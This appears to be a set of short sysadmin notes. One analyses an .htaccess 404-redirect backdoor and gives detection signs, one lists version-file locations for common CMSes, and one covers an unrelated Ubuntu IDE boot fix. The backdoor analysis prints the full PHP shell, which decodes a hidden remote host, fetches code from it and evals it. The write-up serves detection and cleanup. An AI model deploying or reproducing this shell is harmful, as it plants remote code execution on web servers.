A common backdoor once a host is compromised is to create or append to existing .htaccess files a 404 redirect which will open a remote shell to a control server when the .php is hit, usually due to legitimate crawling.  Attackers will intentionally backlink to nonexistent url’s on the compromised host so that Google et al will do the job of opening a remote shell to their control node.  A symptom of this is a spike in load and the amount of connections in the WAITING state when being crawled.

The pair of .htaccess and .php is usually generated into every single folder with unique filenames.  The filename of the php shell is usually a 4-6 character number but will sometimes be a reused dictionary regex.  The .htaccess always contains string “ErrorDocument 404 //” with two forward slashes leading the filename.  The .htaccess is usually less than 200 bytes:

Options -MultiViews
ErrorDocument 404 //wp-content/upload/2008/11/12433.php

There is little variation in the php number shell; usually the payload and destination.  A common file size is 1474 bytes and a common string is ‘aHR0cDov’ which is the base-64 encoding of ‘http:/’.

<? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z=”/?”.base64_encode($a).”.”.base64_encode($b).”.”.base64_encode($c).”.”.base64_encode($d).”.”.base64_encode($e).”.”.base64_encode($f).”.”.base64_encode($g).”.”.base64_encode($h).”.e.”.base64_encode($i).”.”.base64_encode($j);$f=base64_decode(“cGhwc2VhcmNoLmNu”);if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])==”a23ab92502c0050082dd96a32c754520″) $f=$_REQUEST["id"];if((include(base64_decode(“aHR0cDovL2FkczIu”).$f.$z)));else if($c=file_get_contents(base64_decode(“aHR0cDovLzcu”).$f.$z))eval($c);else{$cu=curl_init(base64_decode(“aHR0cDovLzcxLg==”).$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};die(); ?>

Dolphin         ver in inc/header.inc.php
Drupal          version in modules/drupal/drupal.info
gallery2        setGalleryVersion in modules/core/module.inc
Joomla          RELEASE  in libraries/joomla/version.php
Movable Type    version in mt-check.cgi
osCommerce      PROJECT_VERSION in includes/application_top.php
phpBB           PHPBB_VERSION in includes/constants.php
phpnuke         mysql> SELECT Version_Num FROM nuke_config;
phpwcms         version in include/inc_lib/default.inc.php
smf             index.php
tikiwiki        ./tiki-admin_security.php:              7=>’1.9.5′
VtigerCRM       vtiger_current_version in vtigerversion.php
Wordpress       wp-version in wp-includes/version.php
xcart           /VERSION
Zen Cart        ./includes/version.php

Even though the developers tried to resolve the known issues with pata controller vt6415, I still had Ubuntu 11.04 2.6.38-8 x64 panic on enumerating IDE devices.  The solution was boot parameter libata.dma=1.